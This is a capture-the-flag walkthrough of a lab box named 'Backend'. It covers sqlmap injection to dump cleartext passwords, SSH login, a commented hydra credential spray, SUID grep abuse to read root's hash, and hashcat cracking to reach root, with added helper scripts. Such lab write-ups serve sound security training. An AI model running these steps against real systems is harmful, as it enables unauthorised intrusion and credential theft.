
Backend

export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Database Enumeration

Use sqlmap against the login form to find the injectable field and enumerate databases (--forms parses the form and tests its inputs; --batch accepts sqlmap's default answers so the run is unattended; note the flag is --batch, with two dashes):

sqlmap -u http://172.17.0.2/login.html --forms --dbs --batch

Databases Found:

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

Table Enumeration

Identify tables within the users database:

sqlmap -u http://172.17.0.2/login.html --forms -D users --tables --batch

Tables Found:

| usuarios |

Column Enumeration

List columns in the usuarios table:

sqlmap -u http://172.17.0.2/login.html --forms -D users -T usuarios --columns --batch

Columns Found:

| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |

Data Extraction

Dump data from the usuarios table:

sqlmap -u http://172.17.0.2/login.html --forms -D users -T usuarios -C id,username,password --dump --batch

Extracted Data:

| id | username | password      |
| 1 | paco | $paco$123 |
| 2 | pepe | P123pepe3456P |
| 3 | juan | jjuuaann123 |

SSH Access

The passwords are stored in clear text, so try them directly over SSH. pepe's works:

ssh pepe@172.17.0.2 # password: P123pepe3456P
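The dump above is the raw sqlmap table; to try all three accounts at once rather than one by one you want it as login:pass lines. The script below is an added example (not part of the original write-up) that converts a sqlmap --dump table into that format. The table is reconstructed here with the borders sqlmap prints, and the column order (id, username, password) is taken from the -C option used above.

```shell
#!/bin/sh
# Added example: convert a sqlmap --dump table into hydra's login:pass format.
# Assumes the dump was made with -C id,username,password, so field 3 is the
# username and field 4 the password once the line is split on '|'.

# Constructed input: the dump table as sqlmap prints it (borders, header, rows).
SQLMAP_DUMP='+----+----------+---------------+
| id | username | password      |
+----+----------+---------------+
| 1  | paco     | $paco$123     |
| 2  | pepe     | P123pepe3456P |
| 3  | juan     | jjuuaann123   |
+----+----------+---------------+'

# sqlmap_to_creds: read a sqlmap dump table on stdin, print username:password lines.
# Border rows (+---+) and the header row are skipped; sqlmap's padding is trimmed.
# Caveat: a literal '|' inside a value would break the split.
sqlmap_to_creds() {
    awk -F'|' '
        /^\+/ { next }                              # border rows
        {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)
            if ($3 == "username") next               # header row
            if ($3 != "" && $4 != "") print $3 ":" $4
        }'
}

# Usage: write the credential list for hydra, then spray it at the SSH service.
printf '%s\n' "$SQLMAP_DUMP" | sqlmap_to_creds > creds.txt
cat creds.txt
# hydra -C creds.txt ssh://172.17.0.2     (-C takes a colon-separated login:pass file)
```

hydra's -C option reads exactly this login:pass format, so the same file drives the SSH spray; keep the list to the handful of accounts you actually extracted, since sshd throttles and logs repeated failures.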

Privilege Escalation

Find SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Notable SUID Binary:

/usr/bin/grep

grep is not SUID on a stock system, which is what makes it stand out in the list. GTFOBins documents the SUID grep primitive: grep '' FILE prints every line of any file the binary's owner (root) can read.
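The find command returns every SUID file on the box, most of which (passwd, sudo, mount, ...) are expected. What you actually want is the difference from a stock image. The script below is an added example (not from the original write-up) that diffs find's output against a baseline list; both the sample find output and the Debian/Ubuntu-style baseline are constructed for the example and should be extended for the distribution you are on.

```shell
#!/bin/sh
# Added example: triage `find / -perm -u=s -type f` output by removing every
# path that a stock install is expected to have. What is left (here
# /usr/bin/grep) is what you look up on GTFOBins first.
export LC_ALL=C   # fixed collation so sort and comm agree

# Constructed: what the find command returned on the target.
FIND_OUTPUT='/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/grep
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount'

# Assumed baseline of SUID binaries on a stock Debian/Ubuntu system.
SUID_BASELINE='/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# unexpected_suid: read SUID paths on stdin, print those not in SUID_BASELINE.
# comm -23 prints lines present only in the first (sorted) input.
unexpected_suid() {
    base=$(mktemp)
    printf '%s\n' "$SUID_BASELINE" | sort -u > "$base"
    sort -u | comm -23 - "$base"
    rm -f "$base"
}

# Usage on a live target: find / -perm -u=s -type f 2>/dev/null | unexpected_suid
printf '%s\n' "$FIND_OUTPUT" | unexpected_suid
```

On the target itself replace the constructed FIND_OUTPUT with the live find command; anything the function prints is either a custom setuid helper or, as here, a standard tool that should never have the bit set.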

Root Access

List the files in /root:

ls -l /root

File Found:

-rw-r--r-- 1 root root 33 Aug 27 15:15 pass.hash

Read the hash:

grep '' /root/pass.hash

Hash:

e43833c4c9d5ac444e16bb94715a75e4

Identify the hash type:

hash-identifier e43833c4c9d5ac444e16bb94715a75e4

Possible hash type (the tool only has the shape to go on: 32 hex characters also matches NTLM and other 128-bit digests, so treat this as a guess to confirm by cracking):

[+] MD5

Crack the hash using hashcat (-m 0 is raw, unsalted MD5; -a 0 is a straight dictionary attack):

hashcat -m 0 -a 0 "e43833c4c9d5ac444e16bb94715a75e4" /usr/share/wordlists/rockyou.txt

Cracked Password:

spongebob34
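The cracking step is worth seeing without hashcat in the way: mode 0 simply hashes each wordlist entry with raw MD5 and compares it to the target. The script below is an added example (not part of the original write-up) that does exactly that in shell, plus the shape check that hash-identifier relied on. The wordlist is constructed for the example and stands in for rockyou.txt.

```shell
#!/bin/sh
# Added example: dictionary attack on a raw MD5 hash (what hashcat -m 0 -a 0 does),
# written out so the result can be checked with nothing but md5sum.

# Constructed wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST='123456
password
letmein
spongebob34'

# is_md5_shaped HASH: true if HASH is 32 hex characters. This only says "could be
# raw MD5"; NTLM and other 128-bit digests have the same shape.
is_md5_shaped() {
    printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'
}

# md5_crack HASH: read candidates on stdin, print the first whose raw MD5 equals HASH.
# Returns 0 on a hit, 1 when the wordlist is exhausted.
md5_crack() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word; do
        # printf '%s' (no newline): hashing "word\n" would give a different digest
        digest=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$digest" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

# Usage: crack md5("password") from the constructed wordlist.
printf '%s\n' "$WORDLIST" | md5_crack 5f4dcc3b5aa765d61d8327deb882cf99
```

To check the page's result, run md5_crack with the hash from /root/pass.hash and the real wordlist on stdin (md5_crack e43833c4c9d5ac444e16bb94715a75e4 < /usr/share/wordlists/rockyou.txt). Two practical notes on the real tool: hashcat records cracked hashes in its potfile, so a second run of the same command shows nothing until you add --show, and a 14-million-line wordlist is a job for hashcat, not a shell loop that forks md5sum per candidate.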

Switch to root user:

su root # password: spongebob34
id

Root Confirmation:

uid=0(root) gid=0(root) groups=0(root)